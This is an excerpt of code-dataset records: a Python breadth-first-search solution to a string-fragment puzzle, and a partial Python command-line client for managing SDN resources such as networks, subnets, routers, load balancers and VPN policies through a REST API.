{"seq_id":"553393982","text":"from collections import deque\n\ndef solution(strs, t):\n    answer = 20000\n    \n    word_dict = {}\n    already_taken = {}\n    for string in strs: \n        if string[0] not in word_dict: \n            word_dict[string[0]] = [string]\n        else: \n            word_dict[string[0]].append(string)\n    word_end = len(t)\n    queue = deque([(0, 0)])\n    \n    while queue:\n        curr = queue.popleft()\n        curr_word_start = curr[0]\n        curr_cnt = curr[1]\n        \n        if curr_word_start >= word_end:\n            answer = min(answer, curr_cnt)\n            break\n        \n        if t[curr_word_start] in word_dict: \n            word_length = word_end - curr_word_start\n            frag_list = word_dict[t[curr_word_start]] \n            \n            for frag in frag_list: \n                frag_length = len(frag) \n                if frag_length <= word_length: \n                    next_start = curr_word_start + frag_length\n                    if frag == t[curr_word_start : next_start]:\n                        if next_start not in already_taken:\n                            queue.append((next_start, 
curr_cnt + 1))\n already_taken[next_start] = True\n \n if answer == 20000:\n return -1 \n return answer","sub_path":"11week/sehwan/kakao7.py","file_name":"kakao7.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368594538","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport uuid\nimport json\nimport sys\nimport os\nimport re\nimport requests\nimport argparse\nimport time\n\nOPER = {\n 'show': 'READ',\n 'list': 'READALL',\n 'create': 'CREATE',\n 'delete': 'DELETE',\n 'update': 'UPDATE',\n 'insert': 'INSERT_RULE',\n 'remove': 'REMOVE_RULE',\n }\n\nfeatures = {\n 'net': 'Virtual Network',\n 'subnet': 'Subnet',\n 'router': 'Logical Router',\n 'prouter': 'Physical Router',\n 'port': 'Virtual Machine Interface',\n 'lb': 'Loadbalancer',\n 'vpn': 'IpSec VPN',\n 'fw': 'Firewall',\n 'qos': 'Qos',\n 'sg': 'Security Group',\n 'floatingip': 'Floating IP',\n 'provider': 'Public Network Provider',\n 'nodes': 'SDN Nodes',\n 'node': 'SDN Nodes info',\n 'tag': 'Tag',\n 'address-group': 'Address Group',\n 'service-group': 'Service Group',\n 'seg-fw': 'Segment Firewall',\n 'ipam': 'IP Address Management',\n}\n\ndebug = False\ndef DEBUG(*msg):\n if debug:\n print(*msg)\n\ndef debug_out(*msg):\n #enable = True\n enable = False\n if enable:\n print(*msg)\n\ndisable_out = False\ndef out(*msg):\n if not disable_out:\n print(*msg)\n\noutput_format = 'table'\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-f', '--file', help='Read from Json file')\n parser.add_argument('--host', help='Host to get token from')\n parser.add_argument('--token', action='store_true', help='Get token only')\n parser.add_argument('--password', help='Password to login host')\n parser.add_argument('--debug', action='store_true', help='Output curl command for each request')\n parser.add_argument('-g', '--gen-auth', action='store_true', help='Generate authenticate file')\n parser.add_argument('-i', '--interface', metavar='HOST', nargs='+', help='Get vrouter interface in the host')\n parser.add_argument('--netns', action='store_true', help='Show namespace VM')\n parser.add_argument('--no-output', action='store_true', help='Don not print result')\n parser.add_argument('--json', action='store_true', help='Print result with json format')\n def cmd_common(args):\n debug_out('cmd_common: ', args)\n if args.token:\n config = pasrse_config_file()\n api = RestAPI(auth_host=config['auth_host'], auth_port=config['auth_port'], version=config['version'],\n user=config['user'], password=config['password'], project=config['project'])\n token = api.get_token()\n out(token)\n return\n if args.interface:\n for ip in args.interface:\n vr_interface(ip, args.netns)\n return\n if args.gen_auth:\n auth_host = args.host if args.host else '127.0.0.1'\n password = args.password if args.password else 'ArcherAdmin@123'\n path = os.path.dirname(os.path.abspath(__file__))\n auth_file = path + '/auth.json'\n example_file = path + '/example.json'\n if os.path.exists(auth_file):\n print('File already exist')\n return\n with open(auth_file, 'w') as f:\n f.write('#support line comment\\n')\n f.write(json.dumps({\n 'user': 'ArcherAdmin',\n 'password': password,\n 'project': 'ArcherAdmin',\n 'auth_host': auth_host,\n 'auth_port': '6000'\n }, indent=0))\n with open(example_file, 'w') as ef:\n text = []\n text.append('{')\n text.append('#\"user\": \"ArcherAdmin\",')\n text.append('#\"password\": 
\"%s\",' % password)\n text.append('#\"project\": \"ArcherAdmin\",')\n text.append('#\"auth_host\": \"%s\",' % auth_host)\n text.append('\"host\": \"%s\",' % auth_host)\n text.append('\"port\": \"8082\",')\n text.append('\"api\": \"/\",')\n text.append('\"method\": \"get\",')\n text.append('\"body\":')\n text.append('{')\n text.append('}')\n text.append('}')\n ef.write('\\n'.join(text))\n return\n if not args.file:\n parser.print_usage()\n return\n config = pasrse_config_file(args.file)\n api = RestAPI(auth_host=config['auth_host'], auth_port=config['auth_port'], version=config['version'],\n user=config['user'], password=config['password'], project=config['project'])\n if 'header' in config:\n api.add_header(config['header'])\n url = api.encode_url(host=config['host'], port=config['port'], uri=config['api'])\n _, result = api.req(config['method'], url, config['body'])\n out(json.dumps(result, indent=4))\n if isinstance(result, list):\n print('Total resources: %s' % len(result))\n\n parser.set_defaults(func=cmd_common)\n subparsers = parser.add_subparsers()\n for feature in sorted(features.keys()):\n p = subparsers.add_parser(feature, argument_default=argparse.SUPPRESS, help=features[feature])\n ft = feature.replace('-', '_')\n if 'parser_%s' % (ft) in globals():\n globals()['parser_%s' % (ft)](p)\n args = parser.parse_args()\n if args.debug:\n global debug\n debug = True\n if args.json:\n global output_format\n output_format = 'json'\n if args.no_output:\n global disable_out\n disable_out = True\n debug_out('cmd: ', args)\n args.func(args)\n\ndef vr_interface(vrouter_ip, show_ns=False):\n import xml.etree.ElementTree as ET\n from prettytable import PrettyTable\n\n print('VRouter: ', vrouter_ip)\n vm_info = PrettyTable()\n vm_info.field_names = [\"VRouter\", \"VM Name\", \"Intf Name\", \"Intf IP\", \"MetaData IP\", \"VN\", \"FIP\"]\n\n res = requests.get(url=f'http://{vrouter_ip}:8085/Snh_VrouterInfoReq')\n if res.status_code != 200:\n print('error: host is not reachable')\n return\n root = ET.fromstring(res.text)\n vrouter_name = root.find('display_name').text\n compute_name = vrouter_name\n\n res = requests.get(url=f'http://{vrouter_ip}:8085/Snh_ItfReq')\n if res.status_code != 200:\n print('error: host is not reachable')\n return\n res.encoding='utf8'\n root = ET.fromstring(res.text)\n\n for interface in root.iter('ItfSandeshData'):\n intf_name = interface.find('name').text\n vm_name = interface.find('vm_name').text\n if not show_ns and (vm_name is None or vm_name.startswith('NetNS-')):\n continue\n ip_addr = interface.find('ip_addr').text\n mdata_ip_addr = interface.find('mdata_ip_addr').text\n vn = interface.find('vn_name').text\n if vn:\n vn = vn.split(':')[-1]\n fip = None\n fip_e = interface.find('fip_list')\n for fip_list in fip_e.iter('FloatingIpSandeshList'):\n fip = fip_list.find('ip_addr').text\n\n if vm_name is not None:\n vm_info.add_row([compute_name, vm_name, intf_name, ip_addr, mdata_ip_addr, vn, fip])\n print(vm_info)\n\ndef pair_check(sep, value):\n k,o,v= value.partition(sep)\n if not k or not o or not v:\n raise ValueError()\n return value\n\ndef kv(value):\n return pair_check('=', value)\n\ndef RANGE(value):\n return pair_check(':', value)\n\ndef RANGE2(value):\n return pair_check('-', value)\n\ndef BOOL(value):\n if value.lower() in ['true', 'yes']:\n return True\n if value.lower() in ['false', 'no']:\n return False\n raise ValueError()\n\nclass parser_base():\n def __init__(self, parser):\n self.oper = 'list'\n self.res = None\n self.action = None\n\n self.parser = 
parser\n        self.operparser = parser.add_subparsers()\n        self.create_parser = self.operparser.add_parser('create', argument_default=argparse.SUPPRESS, help='Create a resource')\n        self.create_parser.add_argument('--oper', default='create', help=argparse.SUPPRESS)\n        self.create_parser.add_argument('name', metavar='NAME', help='Name or ID to be created')\n        self.create_parser.add_argument('--id', help='Resource ID to be created')\n        self.create_parser.add_argument('--attr', type=json.loads,\n                                        help='JSON of additional attributes to set on the resource')\n        self.create_parser.add_argument('--shared', action='store_true', help='Shared resource')\n        self.create_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n        self.delete_parser = self.operparser.add_parser('delete', help='Delete a resource')\n        self.delete_parser.add_argument('--oper', default='delete', help=argparse.SUPPRESS)\n        self.delete_parser.add_argument('name', metavar='NAME', help='Name or ID to be deleted')\n        self.delete_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n        self.update_parser = self.operparser.add_parser('update', argument_default=argparse.SUPPRESS, help='Update a resource')\n        self.update_parser.add_argument('--oper', default='update', help=argparse.SUPPRESS)\n        self.update_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n        self.update_parser.add_argument('--attr', type=json.loads,\n                                        help='JSON of additional attributes to update on the resource')\n        self.update_parser.add_argument('--shared', type=BOOL, help='Shared resource')\n        self.update_parser.add_argument('--enabled', type=BOOL)\n        self.update_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n        self.show_parser = self.operparser.add_parser('show', argument_default=argparse.SUPPRESS, help='Show a resource')\n        self.show_parser.add_argument('--oper', default='show', help=argparse.SUPPRESS)\n        self.show_parser.add_argument('name', metavar='NAME', help='Name or ID to be displayed')\n        self.show_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n\n        self.list_parser = self.operparser.add_parser('list', argument_default=argparse.SUPPRESS, help='Show all resources of this type')\n        self.list_parser.add_argument('--oper', default='list', help=argparse.SUPPRESS)\n        self.list_parser.add_argument('--id', nargs='+', help='Filter by id')\n        self.list_parser.add_argument('--name', nargs='+', help='Filter by name')\n        self.list_parser.add_argument('--filters', type=json.loads)\n        self.list_parser.add_argument('--start', help='Pagination: UUID to start from; leave empty for the first request')\n        self.list_parser.add_argument('--count', help='Pagination: how many items to return')\n        self.list_parser.add_argument('--no-admin', action='store_true', help='Request without admin role')\n        self.list_parser.set_defaults(func=self.cmd_list)\n\n    def cmd_base(self, args):\n        if 'shared' in args:\n            self.res.shared = args.shared\n        if 'enabled' in args:\n            self.res.enabled = args.enabled\n        if 'oper' in args:\n            self.res.oper = OPER[args.oper]\n        if 'name' not in args:\n            return\n        try:\n            uuid.UUID(args.name)\n            self.res.id = args.name\n        except ValueError as e:\n            self.res.name = args.name\n        if 'id' in args:\n            self.res.id = args.id\n            self.res.name = args.name\n        if 'no_admin' in args:\n            self.res.context['is_admin'] = False\n        if 'attr' in args:\n            self.res.resource.update(args.attr)\n            #for attr in args.attr:\n            #    k,_,v = attr.partition('=')\n            #    
self.res.resource[k] = v\n\n    def cmd_list(self, args):\n        debug_out('cmd_list: ', args)\n        self.res.oper = OPER[args.oper]\n        if 'no_admin' in args:\n            self.res.context['is_admin'] = False\n        if 'net' in args:\n            net_id = [self.name_to_id(VirtualNetwork(), net) for net in args.net]\n            self.res.filters['network_id'] = net_id\n        if 'prefix' in args:\n            self.res.filters['prefix'] = args.prefix\n        if 'name' in args:\n            self.res.filters['name'] = args.name\n        if 'id' in args:\n            self.res.filters['id'] = args.id\n        if 'mac' in args:\n            self.res.filters['mac_address'] = args.mac\n        if 'status' in args:\n            self.res.filters['status'] = args.status\n        if 'device' in args:\n            self.res.filters['device_id'] = args.device\n        if 'filters' in args:\n            self.res.filters = args.filters\n        if 'start' in args:\n            self.res.filters['marker'] = args.start\n        if 'count' in args:\n            self.res.filters['limit'] = args.count\n        self.cmd_action()\n\n    def cmd_action(self, res=None):\n        action_res = self.res if not res else res\n        if self.action:\n            self.action.set_res(action_res)\n        else:\n            self.action = ResourceAction(action_res)\n        self.action.post()\n\n    def name_to_id(self, res, name):\n        try:\n            return str(uuid.UUID(name))\n        except ValueError as e:\n            pass\n        if self.action:\n            self.action.set_res(res)\n        else:\n            self.action = ResourceAction(res)\n        return self.action.name_to_id(name)\n\nclass parser_net(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = VirtualNetwork()\n        group = self.create_parser.add_mutually_exclusive_group()\n        group.add_argument('--vlan', default=argparse.SUPPRESS, help='VLAN ID for public network')\n        group.add_argument('--vxlan', default=argparse.SUPPRESS, help='VXLAN ID for private network')\n        self.create_parser.add_argument('--tag', nargs='*', help='Tag')\n        self.create_parser.add_argument('--forward', choices=['l2', 'l3', 'l2_l3'], help='Forwarding mode')\n        self.create_parser.add_argument('--mode', choices=['flat-subnet-only', 'user-defined-subnet-preferred',\n                                                           'flat-subnet-preferred', 'user-defined-subnet-only'],\n                                        help='Address allocation mode')\n        parser.set_defaults(func=self.cmd_net)\n\n    def cmd_net(self, args):\n        debug_out('cmd_net: ', args)\n        self.cmd_base(args)\n        if 'vlan' in args:\n            self.res.external = True\n            self.res.segment = args.vlan\n        if 'vxlan' in args:\n            self.res.external = False\n            self.res.segment = args.vxlan\n        if 'tag' in args:\n            self.res.resource['tag'] = args.tag\n        if 'mode' in args:\n            self.res.resource['address_allocation_mode'] = args.mode\n        if 'forward' in args:\n            self.res.resource['forwarding_mode'] = args.forward\n        self.cmd_action()\n\nclass parser_ipam(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = IpAM()\n        self.create_parser.add_argument('--method', choices=['flat-subnet', 'user-defined-subnet'], help='Method to create subnet')\n        parser.set_defaults(func=self.cmd_ipam)\n\n    def cmd_ipam(self, args):\n        debug_out('cmd_ipam: ', args)\n        self.cmd_base(args)\n        if 'method' in args:\n            self.res.resource['ipam_subnet_method'] = args.method\n        self.cmd_action()\n\nclass parser_subnet(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = Subnet()\n        self.create_parser.add_argument('-n', '--net', required=True, help='Network that the subnet belongs to')\n        self.create_parser.add_argument('-p', '--prefix', required=True, help='Prefix of a subnet')\n        self.create_parser.add_argument('--no-dhcp', action='store_true', help='Disable DHCP')\n        self.create_parser.add_argument('--no-gateway', action='store_true', help='Disable 
gateway')\n self.create_parser.add_argument('--pools', type=RANGE2, metavar='START-END', nargs='+',\n help='Allocation pools')\n self.create_parser.add_argument('--ipam', help='IPAM to be used')\n\n self.list_parser.add_argument('--net', nargs='+', help='Filter by network')\n self.list_parser.add_argument('--prefix', nargs='+', help='Filter by prefix')\n parser.set_defaults(func=self.cmd_subnet)\n\n def cmd_subnet(self, args):\n debug_out('cmd_subnet: ', args)\n self.cmd_base(args)\n if 'net' in args:\n self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n if 'prefix' in args:\n self.res.cidr = args.prefix\n if 'no_dhcp' in args:\n self.res.dhcp = '0.0.0.0'\n if 'no_gateway' in args:\n self.res.gateway = '0.0.0.0'\n if 'pools' in args:\n for pool in args.pools:\n pool = pool.split('-')\n self.res.add_alloc_pool(pool[0], pool[1])\n if 'ipam' in args:\n self.res.resource['ipam_fq_name'] = ['default-domain', 'ArcherAdmin', args.ipam]\n self.cmd_action()\n\nclass parser_router(parser_base):\n def fixed_ip(value):\n args = value.split(':')\n if len(args) > 2:\n raise ValueError()\n return {'ip_address': args[0], 'subnet_id': args[1]}\n\n def __init__(self, parser):\n super().__init__(parser)\n self.res = Router()\n gw_parser = self.create_parser.add_subparsers()\n gw = gw_parser.add_parser('gateway', argument_default=argparse.SUPPRESS)\n gw.add_argument('-n', '--net', help='Network of gateway')\n gw.add_argument('-i', '--fixed-ip', help='Fixed IP address of gateway')\n gw.set_defaults(func=self.cmd_gateway)\n\n subparser = self.update_parser.add_subparsers()\n gw = subparser.add_parser('gateway', argument_default=argparse.SUPPRESS)\n gw.add_argument('-r', '--remove', action='store_true', help='Remove gateway')\n gw.add_argument('-n', '--net', help='Network of gateway')\n gw.add_argument('-i', '--fixed-ip', metavar='IP:SUBNET-ID', type=self.fixed_ip, help='Fixed IP address of gateway')\n gw.set_defaults(func=self.cmd_gateway)\n pf = subparser.add_parser('port-forward', argument_default=argparse.SUPPRESS)\n pf.add_argument('-p', '--protocol', required=True, help='Protocol used in port forwarding')\n pf.add_argument('-s', '--service-port', required=True, help = 'Service port exposed to the public')\n pf.add_argument('--vm-ip', required=True, help='IP of VM in private network')\n pf.add_argument('--vm-port', required=True, help='VM port to supply service')\n pf.set_defaults(func=self.cmd_portforward)\n\n subnet_g = self.update_parser.add_mutually_exclusive_group()\n subnet_g.add_argument('-s', '--subnet', help='Private subnet')\n subnet_g.add_argument('-S', '--no-subnet', help='Remove private subnet')\n self.update_parser.add_argument('-P', '--no-port-forward', help='Remove port-forwarding')\n\n self.show_parser.add_argument('-p', '--port', action='store_true', help='Display ports of this router')\n self.show_parser.set_defaults(func=self.cmd_show)\n\n parser.set_defaults(func=self.cmd_router)\n\n def cmd_router(self, args):\n debug_out('cmd_router: ', args)\n self.cmd_base(args)\n if 'subnet' in args:\n self.res.oper = 'ADDINTERFACE'\n self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n self.cmd_action()\n if 'no_subnet' in args:\n self.res.oper = 'DELINTERFACE'\n self.res.subnet = self.name_to_id(Subnet(), args.no_subnet)\n self.cmd_action()\n if 'no_port_forward' in args:\n self.res.portforward = None\n self.cmd_action()\n self.res.oper = OPER[args.oper]\n self.cmd_action()\n\n def cmd_show(self, args):\n debug_out('cmd_show: ', args)\n if 'port' in args:\n res = Port()\n 
res.filters['device_id'] = [self.name_to_id(Router(), args.name)]\n            self.cmd_action(res)\n            print('**** Router %s Information ****' % args.name)\n        self.cmd_router(args)\n\n    def cmd_gateway(self, args):\n        debug_out('cmd_gateway: ', args)\n        self.cmd_base(args)\n        if 'net' in args:\n            self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n        if 'fixed_ip' in args:\n            self.res.fixed_ip = args.fixed_ip\n        if 'remove' in args:\n            self.res.gateway = None\n        self.cmd_router(args)\n\n    def cmd_portforward(self, args):\n        debug_out('cmd_portforward: ', args)\n        pf = self.res.PortForwording(args.protocol, args.vm_ip, args.vm_port, args.service_port)\n        self.cmd_base(args)\n        self.res.portforward = pf\n        self.cmd_router(args)\n\nclass parser_port(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = Port()\n        self.create_parser.add_argument('-n', '--net', required=True, help='Network the port should be created in')\n        self.create_parser.add_argument('-s', '--subnet', help='Subnet the port should be created in')\n        self.create_parser.add_argument('--ip', help='Fixed IP address to allocate')\n        self.create_parser.add_argument('--tag', nargs='*', help='Tag')\n\n        self.update_parser.add_argument('-q', '--qos', metavar='Qos-ID', nargs='*', help='Ingress and egress QoS IDs only; pass no values to remove QoS')\n        self.update_parser.add_argument('--tag', nargs='*', help='Tag')\n\n        subparser = self.update_parser.add_subparsers()\n        mr = subparser.add_parser('mirror', argument_default=argparse.SUPPRESS)\n        mr.add_argument('-n', '--mirror-name', help='Analyzer name')\n        mr.add_argument('--net', help='Mirror network id')\n        mr.add_argument('-i', '--ip', help='Analyzer IP address')\n        mr.add_argument('-m', '--mac', help='Analyzer mac address')\n        mr.set_defaults(func=self.cmd_mirror)\n\n        self.list_parser.add_argument('--net', nargs='+', help='Filter by network')\n        self.list_parser.add_argument('--mac', nargs='+', help='Filter by mac address')\n        self.list_parser.add_argument('--status', nargs='+', help='Filter by status')\n        self.list_parser.add_argument('--device', nargs='+', help='Filter by device id')\n        self.list_parser.set_defaults(func=self.cmd_list)\n\n        parser.set_defaults(func=self.cmd_port)\n\n    def cmd_port(self, args):\n        debug_out('cmd_port: ', args)\n        self.cmd_base(args)\n        if 'net' in args:\n            self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n        if 'subnet' in args:\n            self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n        if 'ip' in args:\n            self.res.ip = args.ip\n        if 'qos' in args:\n            self.res.qos = args.qos\n        if 'tag' in args:\n            self.res.resource['tags'] = args.tag\n        self.cmd_action()\n\n    def cmd_mirror(self, args):\n        debug_out('cmd_mirror: ', args)\n        self.cmd_base(args)\n        self.res.resource['interface_mirror'] = {}\n        res = self.res.resource['interface_mirror']\n        if 'net' in args:\n            res['network_id'] = self.name_to_id(VirtualNetwork(), args.net)\n        if 'ip' in args:\n            res['analyzer_ip_address'] = args.ip\n        if 'mac' in args:\n            res['analyzer_mac_address'] = args.mac\n        if 'mirror_name' in args:\n            res['analyzer_name'] = args.mirror_name\n        self.cmd_action()\n\nclass parser_floatingip(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = FloatingIP()\n        self.create_parser.add_argument('-n', '--net', required=True, help='Network the floating IP is allocated from')\n        self.create_parser.add_argument('-s', '--subnet', help='Subnet the floating IP is allocated from')\n        self.create_parser.add_argument('--ip', help='Floating IP address to allocate')\n        
self.create_parser.add_argument('--fixed-ip', help='Fixed ip address associated with floating ip')\n        self.create_parser.add_argument('-p', '--port', help='Port associated with floating ip')\n        self.update_parser.add_argument('-p', '--port', nargs='?', help='Port associated with floating ip, remove if no value')\n        parser.set_defaults(func=self.cmd_floatingip)\n\n    def cmd_floatingip(self, args):\n        debug_out('cmd_floatingip: ', args)\n        self.cmd_base(args)\n        if 'net' in args:\n            self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n        if 'subnet' in args:\n            self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n        if 'ip' in args:\n            self.res.ip = args.ip\n        if 'fixed_ip' in args:\n            self.res.fixed_ip = args.fixed_ip\n        if 'port' in args:\n            if args.port:\n                self.res.port = self.name_to_id(Port(), args.port)\n            else:\n                self.res.port = None\n        self.cmd_action()\n\nclass parser_lb(parser_base):\n    def __init__(self, parser):\n        self.action = None\n        self.parser = parser\n        parser.add_argument('--config', action='store_true', help='Loadbalancer global config')\n        subparser = self.parser.add_subparsers()\n        lb = subparser.add_parser('loadbalancer', aliases=['lb'], help='Loadbalancer')\n        parser_loadbalancer(lb)\n        listener = subparser.add_parser('listener', help='Listener for loadbalancer')\n        parser_listener(listener)\n        pool = subparser.add_parser('pool', help='Pool for loadbalancer')\n        parser_pool(pool)\n        member = subparser.add_parser('member', help='Member of pool')\n        parser_member(member)\n        monitor = subparser.add_parser('monitor', help='Health monitor for each pool')\n        parser_lbmonitor(monitor)\n        parser.set_defaults(func=self.cmd_lb)\n\n    def cmd_lb(self, args):\n        debug_out('cmd_lb: ', args)\n        if 'config' in args:\n            self.res = LoadBalancer()\n            self.res.url = self.res.url.replace('loadbalancer', 'loadbalancer_config')\n            self.cmd_action()\n        else:\n            self.parser.print_usage()\n\nclass parser_loadbalancer(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = LoadBalancer()\n        self.create_parser.add_argument('-s', '--subnet', required=True, help='VIP subnet')\n        self.create_parser.add_argument('-i', '--vip', help='IP address of VIP')\n        self.create_parser.add_argument('-p', '--provider', default='arsdn', choices=['arsdn', 'octavia'], help='Provider of LB')\n        self.create_parser.add_argument('--listeners', metavar='LISTENERID', nargs='+', help='Listener ID')\n        self.create_parser.add_argument('--pools', metavar='POOLID', nargs='+', help='Pool ID')\n        self.create_parser.add_argument('-c', '--cluster', help='Cluster IP')\n        self.update_parser.add_argument('--pool', help='Pool ID')\n\n        parser.set_defaults(func=self.cmd_loadbalancer)\n\n    def cmd_loadbalancer(self, args):\n        debug_out('cmd_loadbalancer: ', args)\n        self.cmd_base(args)\n        if 'subnet' in args:\n            self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n        if 'vip' in args:\n            self.res.vip = args.vip\n        if 'provider' in args:\n            self.res.provider = args.provider\n        if 'cluster' in args:\n            self.res.cluster = args.cluster\n        if 'listeners' in args:\n            self.res.listeners = [self.name_to_id(LoadBalanceListener(), l) for l in args.listeners]\n        if 'pools' in args:\n            self.res.pools = [self.name_to_id(LoadBalancePool(), p) for p in args.pools]\n        self.cmd_action()\n\nclass parser_listener(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = LoadBalanceListener()\n        self.create_parser.add_argument('--lb', required=True, help='LoadBalancer for listener')\n        self.create_parser.add_argument('--port', required=True, help='Protocol port to listen')\n        self.create_parser.add_argument('-p', '--protocol', required=True, help='Protocol to listen', choices=['udp', 'tcp', 'http', 'https', 'terminated_https'])\n        self.create_parser.add_argument('-c', '--cert', help='Default cert ref for https')\n        self.create_parser.add_argument('--certs', nargs='+', help='Cert refs for https')\n        parser.set_defaults(func=self.cmd_listener)\n\n    def cmd_listener(self, args):\n        debug_out('cmd_listener: ', args)\n        self.cmd_base(args)\n        if 'port' in args:\n            self.res.port = args.port\n        if 'protocol' in args:\n            self.res.protocol = args.protocol.upper()\n        if 'lb' in args:\n            self.res.lb = self.name_to_id(LoadBalancer(), args.lb)\n        if 'cert' in args:\n            self.res.resource['default_tls_container_ref'] = args.cert\n        if 'certs' in args:\n            self.res.resource['sni_container_refs'] = args.certs\n        self.cmd_action()\n\nclass parser_pool(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = LoadBalancePool()\n        self.create_parser.add_argument('--lb', help='LoadBalancer for pool')\n        self.create_parser.add_argument('-l', '--listener', help='Listener for pool')\n        self.create_parser.add_argument('-a', '--algorithm', default='round_robin', help='Load balancing algorithm', choices=['round_robin', 'least_connections', 'source_ip'])\n        self.create_parser.add_argument('-p', '--protocol', required=True, help='Protocol to listen', choices=['udp', 'tcp', 'http', 'https', 'terminated_https'])\n        self.create_parser.set_defaults(func=self.cmd_pool_create)\n        parser.set_defaults(func=self.cmd_pool)\n\n    def cmd_pool_create(self, args):\n        debug_out('cmd_pool_create: ', args)\n        self.cmd_base(args)\n        if 'algorithm' in args:\n            self.res.algorithm = args.algorithm.upper()\n        if 'protocol' in args:\n            self.res.protocol = args.protocol.upper()\n        if 'lb' in args:\n            self.res.lb = self.name_to_id(LoadBalancer(), args.lb)\n        if 'listener' in args:\n            self.res.listener = self.name_to_id(LoadBalanceListener(), args.listener)\n        if not self.res.lb and not self.res.listener:\n            self.create_parser.error('one of the arguments --lb or -l/--listener is required')\n        self.cmd_action()\n\n    def cmd_pool(self, args):\n        debug_out('cmd_pool: ', args)\n        self.cmd_base(args)\n        self.cmd_action()\n\nclass parser_member(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = LoadBalanceMember()\n        self.create_parser.add_argument('-s', '--subnet', required=True, help='Subnet the member belongs to')\n        self.create_parser.add_argument('--port', required=True, help='Service port')\n        self.create_parser.add_argument('--ip', required=True, help='IP address of member')\n        self.parser.add_argument('-p', '--pool', required=True, help='Pool the member belongs to')\n\n        parser.set_defaults(func=self.cmd_member)\n\n    def cmd_member(self, args):\n        debug_out('cmd_member: ', args)\n        self.cmd_base(args)\n        self.res.pool = self.name_to_id(LoadBalancePool(), args.pool)\n        if 'port' in args:\n            self.res.port = args.port\n        if 'ip' in args:\n            self.res.ip = args.ip\n        if 'subnet' in args:\n            self.res.subnet = self.name_to_id(Subnet(), args.subnet)\n        self.cmd_action()\n\n    def cmd_list(self, args):\n        self.res.pool = self.name_to_id(LoadBalancePool(), args.pool)\n        super().cmd_list(args)\n\nclass parser_lbmonitor(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = LoadBalanceHealthMonitor()\n        self.create_parser.add_argument('-d', '--delay', required=True, help='Interval of monitor check')\n        self.create_parser.add_argument('-t', '--timeout', required=True, help='Timeout for monitor')\n        self.create_parser.add_argument('-m', '--max-retries', required=True, help='Max retries if timeout')\n        self.create_parser.add_argument('-p', '--protocol', required=True, help='Protocol of listener', choices=['tcp', 'http', 'https'])\n        self.parser.add_argument('-p', '--pool', required=True, help='Pool the monitor belongs to')\n        parser.set_defaults(func=self.cmd_lbmonitor)\n\n    def cmd_lbmonitor(self, args):\n        debug_out('cmd_lbmonitor: ', args)\n        self.cmd_base(args)\n        self.res.pool = args.pool\n        if 'protocol' in args:\n            self.res.protocol = args.protocol.upper()\n        if 'delay' in args:\n            self.res.delay = args.delay\n        if 'timeout' in args:\n            self.res.timeout = args.timeout\n        if 'max_retries' in args:\n            self.res.max_retries = args.max_retries\n        self.cmd_action()\n\nclass parser_vpn(parser_base):\n    def __init__(self, parser):\n        self.parser = parser\n        subparser = self.parser.add_subparsers()\n        ike = subparser.add_parser('ike', help='IKE policy')\n        parser_ike(ike)\n        ipsec = subparser.add_parser('ipsec', help='IpSec policy')\n        parser_ipsec(ipsec)\n        endpoint = subparser.add_parser('endpoint', help='VPN endpoint group')\n        parser_endpoint(endpoint)\n        service = subparser.add_parser('service', help='VPN service')\n        parser_service(service)\n        connection = subparser.add_parser('connection', help='IpSec connection')\n        parser_connection(connection)\n        p2s = subparser.add_parser('p2s', help='IpSec peer 2 site connection')\n        parser_p2s(p2s)\n        parser.set_defaults(func=self.cmd_vpn)\n\n    def cmd_vpn(self, args):\n        self.parser.print_usage()\n\nclass parser_ike(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = IkePolicy()\n        self.create_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n        self.create_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n        self.create_parser.add_argument('-v', '--ike-version', help='IKE version', choices=['v1','v2'])\n\n        self.update_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n        self.update_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n        self.update_parser.add_argument('-v', '--ike-version', help='IKE version', choices=['v1','v2'])\n        parser.set_defaults(func=self.cmd_ike)\n\n    def cmd_ike(self, args):\n        debug_out('cmd_ike: ', args)\n        self.cmd_base(args)\n        if 'auth_algorithm' in args:\n            self.res.auth_algorithm = args.auth_algorithm\n        if 'encryption_algorithm' in args:\n            self.res.encryption_algorithm = args.encryption_algorithm\n        if 'ike_version' in args:\n            self.res.ike_version = args.ike_version\n        self.cmd_action()\n\nclass parser_ipsec(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = IpsecPolicy()\n        self.create_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n        self.create_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n        